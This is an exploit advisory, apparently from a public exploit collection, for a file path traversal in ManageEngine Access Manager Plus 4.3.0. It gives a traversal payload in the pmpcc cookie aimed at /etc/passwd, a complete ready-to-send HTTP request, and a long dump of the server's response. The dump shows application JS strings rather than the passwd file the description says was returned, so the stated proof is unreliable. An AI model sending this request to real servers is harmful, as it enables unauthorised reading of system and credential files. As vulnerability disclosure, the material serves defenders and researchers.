ManageEngine Access Manager Plus 4.3.0 Path Traversal

## Exploit Title: ManageEngine Access Manager Plus 4.3.0 - File-path-traversal## Author: nu11secur1ty## Date: 11.22.2023## Vendor: https://www.manageengine.com/## Software: https://www.manageengine.com/privileged-session-management/download.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309)## Description:The `pmpcc` cookie is vulnerable to path traversal attacks, enablingread access to arbitrary files on the server.The testing payload..././..././..././..././..././..././..././..././..././..././etc/passwdwas submitted in the pmpcc cookie.The requested file was returned in the application's response.The attacker easy can see all the JS structures of the server and canperform very dangerous actions.## STATUS: HIGH Vulnerability[+] Exploits:```GETGET /amp/webapi/?requestType=GET_AMP_JS_VALUES HTTP/1.1Host: localhost:9292Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Cookie: pmpcc=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd;_zcsr_tmp=41143b42-8ff3-4fb0-8b30-688f63f9bf9a;JSESSIONID=2D2DB63E708680CBC717A8A165CE1D6E;JSESSIONIDSSO=314212F36F55D2CE1E7A76F98800E194Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Mobile: ?0X-Requested-With: XMLHttpRequestSec-CH-UA-Platform: WindowsReferer: https://localhost:9292/AMPHome.html```[+] Response:```,'js.pmp.helpCertRequest.subcontent10':'The issued certificate ise-mailed to the user who raises the request, the user who closes therequest and also to those e-mail ids specified at the time of closingthe request.','js.admin.HelpDeskIntegrate.UsernameEgServiceNow':'ServiceNow login username','js.PassTrixMainTab.ActiveDirectory.next_schedule_time':'Nextsynchronization is scheduled to run on','js.agent.csharp_Windows_Agent':'C# Windows Agent','js.PassTrixMainTab.in_sec':'Seconds','godaddy.importcsr.selectfileorpastecontent':'Either select a file orpaste the CSR content.','js.connection.colors':'Colors','js.general.ShareToGroups':'Share resource to user groups','js.connection.mapdisk':'Drives','jsp.admin.Support.User_Forums':'User Forums','js.general.CreateResource.Dns_url_check':'Enter a valid URL . Forcloud services (Rackspace and AWS IAM), the DNS name <br>looks like aURL (ex:  https:\/\/identity.api.rackspacecloud.com\/v2.0)','js.admin.RPA_Integration.About':'PAM360 renders bots that seamlesslyintegrate and perfectly fit into the pre-designed and automatedintegrations of the below listed RPA-powered platforms, to simulatethe routine manual password retrieval from the PAM360 vault.','js.discovery.loadhostnamefromfile':'From file','js.AddListenerDetails.Please_enter_valid_implementation_class':'Pleaseenter a valid Implementation Class','js.general.GroupedResources':'Grouped Resources','js.general.SlaveServer':'This operation is not permitted in Secondary Server.','PROCESSID':'Process Id','js.resources.serviceaccount.SupportedSAccounts.Services_fetched_successfully':'Servicesfetched successfully','assign.defaultdns.nodnsconfigured':'No default DNS available\/enabled','js.commonstr.search':'Search','js.discovery.usercredential_type':'Credential Type','jsp.admin.GeneralSetting.Check_high_availability_status_for':'Checkhigh availability status every <input type=\"text\" class=\"txtbox\"name=\"check_duration\" value=\"{0}\" size=\"5\" maxlength=\"5\"style=\"width:60px\" onkeypress=\"if(event.keyCode==13)return false;\"> minutes.','pki.js.help.entervalidnumber':'Please enter a valid number forNumeric Field Default Value.','js.remoteapp.fetch':'Fetch','js.admin.HighAvailability.configured_successfully':'Configured Successfully','js.generalSettings_searchTerm_Password_reset':'Password Reset,Reason for password reset, disable ticket id, waiting time, wait timefor service account password reset, linux unix password reset','letsencrypt.enter.domainnames':'Enter domain names','js.discovery.resourcetype':'Resource Type','js.HomeTab.UserTab':'Set this tab as default view for \'Users\'','js.report.timeline.todate':'Valid To','js.general_Language_Changed_Successfully':'Language Changed Successfully','js.aws.credentials.label':'AWS Credential','auditpurge.helpnote1':'Enter 0 or leave the field blank to disablepurging of audit trails.','js.general.user.orgn_bulkManage':'Manage Organization','js.rolename.SSH_KEY':'Create\/Add key','js.admin.admin.singledbmultiserver.name':'Application Scaling','lets.encrypt.requestreport':'Let\'s Encrypt Requests Report','js.settings.breach_settings.disable_api':'Disable API Access','js.cmd.delete.not_possible':'Command cannot be deleted as it isalready added to the following command set(s).','js.settings.notification.domaincontent':'Notify if domains areexpiring within','js.aws.searchuser':'--Search UserName--','jsp.admin.GeneralSetting.helpdesk_conf':'Configure the ticketingsystem settings in Admin >> General >> Ticketing System Integration.','js.discovery.port':'Gateway Port','usermanagement.showCertificates':'Show Certificates','js.general.DestinationDirectoryCannotBeEmpty':'Destination directorycannot be empty','js.sshreport.title':'SSH Resource Report','js.encryptionkey.update':'Update','js.aws.regions':'Region','js.settingsTitle1.UserManagement':'User Management','js.passwordPolicy.setRange':'Enforce minimum or maximum password length','js.commonstr.selectResources':'Select Resources','RULENAME':'Rule Name','jsp.admin.usergroups.AddUserGroupDialog.User_Group_added_successfully':'UserGroup added successfully','js.reports.SSHReports.title':'SSH Reports','js.CommonStr.ValueIsLess':'value is less than 2','js.discovery.discoverystatus':'Discovery Status','js.settings.security_settings.Web_Access':'Web Access','js.general.node_name_cannot_be_empty':'Node name cannot be empty','js.deploy.audit':'Deploy Audit','js.agentdiscovery.msca.title':'Microsoft Certificate Authority','jsp.resources.AccessControlView.Choose_the_excluded_groups':'Nominateuser group(s) to exempt from access control.','js.pki.SelectCertificateGroup':'Select Certificate Group(s)','js.admin.HighAvailability.High_Availability_status':'Status','settings.metracker.note0':'Disable ME Tracker if you do not wish toallow ManageEngine to collect product usage details.','SERVICENAME':'Service Name','settings.metracker.note1':'Access Manager Plus server has to berestarted for the changes to take effect.','js.general.NewPinMismatch':'New PIN Mismatch','js.HomeTab.ResourceTab':'Set this tab as default view for \'Resources\'','java.ScheduleUtil.minutes':'minutes','js.admin.sdpop_change.tooltip':'Enabling this option will requireyour users to provide valid Change IDs for the validation of passwordaccess requests and other similar operations. Leaving this optionunchecked requires the users to submit valid Request IDs forvalidation.','js.privacy_settings.title.redact':'Redact','js.admin.passwordrequests.Target_Resource_Selection_Alert':'Only 25resources can be selected','js.aboutpage.websitetitle':'Website','js.customize.NumericField':'Numeric Field','js.please.select.file':'Please select a file to upload.','js.AutoLogon.Remote_connections':'Remote Connections','pki.snmp.port':'Port','java.dashboardutils.TODAY':'TODAY','js.schedule.starttime':'Start Time','js.ssh.keypassphrase':'Passphrase','js.gettingstarted.keystore.step1.one':'Add keys to Access Manager Plus','js.analytics.tab.ueba.msg4':'guide','js.analytics.tab.ueba.msg5':'to complete the integration. For anyfurther questions, please write to us [email protected].','js.reportType.Option7.UserAuditReport':'Audit Report','js.common.csr':'CSR','js.globalsign.reissue.order':'Reissue Order','js.analytics.tab.ueba.msg6':'Build a platform of expected behaviorfor individual users and entities by mapping different user accounts','js.analytics.tab.ueba.msg7':'Verify actionable reports thatsymbolize compromise with details about actual behavior and expectedbehavior.','js.resources.importcredential':'Import Credentials','js.analytics.tab.ueba.msg1':'The Advanced Analytics module forPAM360, offered via ManageEngine Log360 UEBA, analyzes logs fromdifferent sources, including firewalls, routers, workstations,databases, file servers and cloud services. Any deviation from normalbehavior is classified as a time, count, or pattern anomaly. It thengives actionable insight to the IT Administrator with the use of riskscores, anomaly trends, and intuitive reports.','js.analytics.tab.ueba.msg2':'With Log360 UEBA analytics, you can:','js.analytics.tab.ueba.msg3':'To activate Log360 UEBA for your PAM360instance, download Log360 UEBA from the below link and follow theinstructions in this','js.settingsTitle2.MailServer':'Mail Server','jsp.admin.managekey.ChangeKey.Managing_the_PMP_encryption_key':'ManagingAMP Encryption Key','settings.unmappedmails.email':'E-mail Address','amp.connection.connection_type':'Connection Type','js.analytics.tab.ueba.msg8':'Diagnose anomalous user behavior basedon activity time, count, and pattern.','godaddy.contactphone':'Contact Phone','js.general.HelpDeskIntegrate.ClassSameException':'Class name alreadyimplemented. Implement with some other class.','js.analytics.tab.ueba.msg9':'Track abnormal entity behaviors inWindows devices, SQL servers, FTP servers, and network devices such asrouters, firewalls, and switches.','js.rolename.freeCA.acme':'ACME','digicert.label.dcv.cname':'CNAME Token','js.helpcontent.createuser':'User Creation ','pgpkeys.key.details':'Key Information','js.resources.discovery.ResourceDiscoveryStatus.discovery':'Discovery Status','js.HomeTab.TaskAuditView':'Task Audit','pki.js.certs.certGroupsSharedByUserGroups':'Certificate GroupsShared With User Group(s)','js.common.importcsr.format':'(File format should be .csr)','js.notificationpolicy.Submit':'Save','pmp.vct.User_Audit_Configuration':'User Audit Configuration'.........```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ManageEngine/Access-Manager-Plus-version-4.3-(Build-4309))## Reference:[href](https://portswigger.net/kb/issues/00100300_file-path-traversal)## Proof and Exploit:[href](https://streamable.com/scdzsb)## Time spent`03:00:00`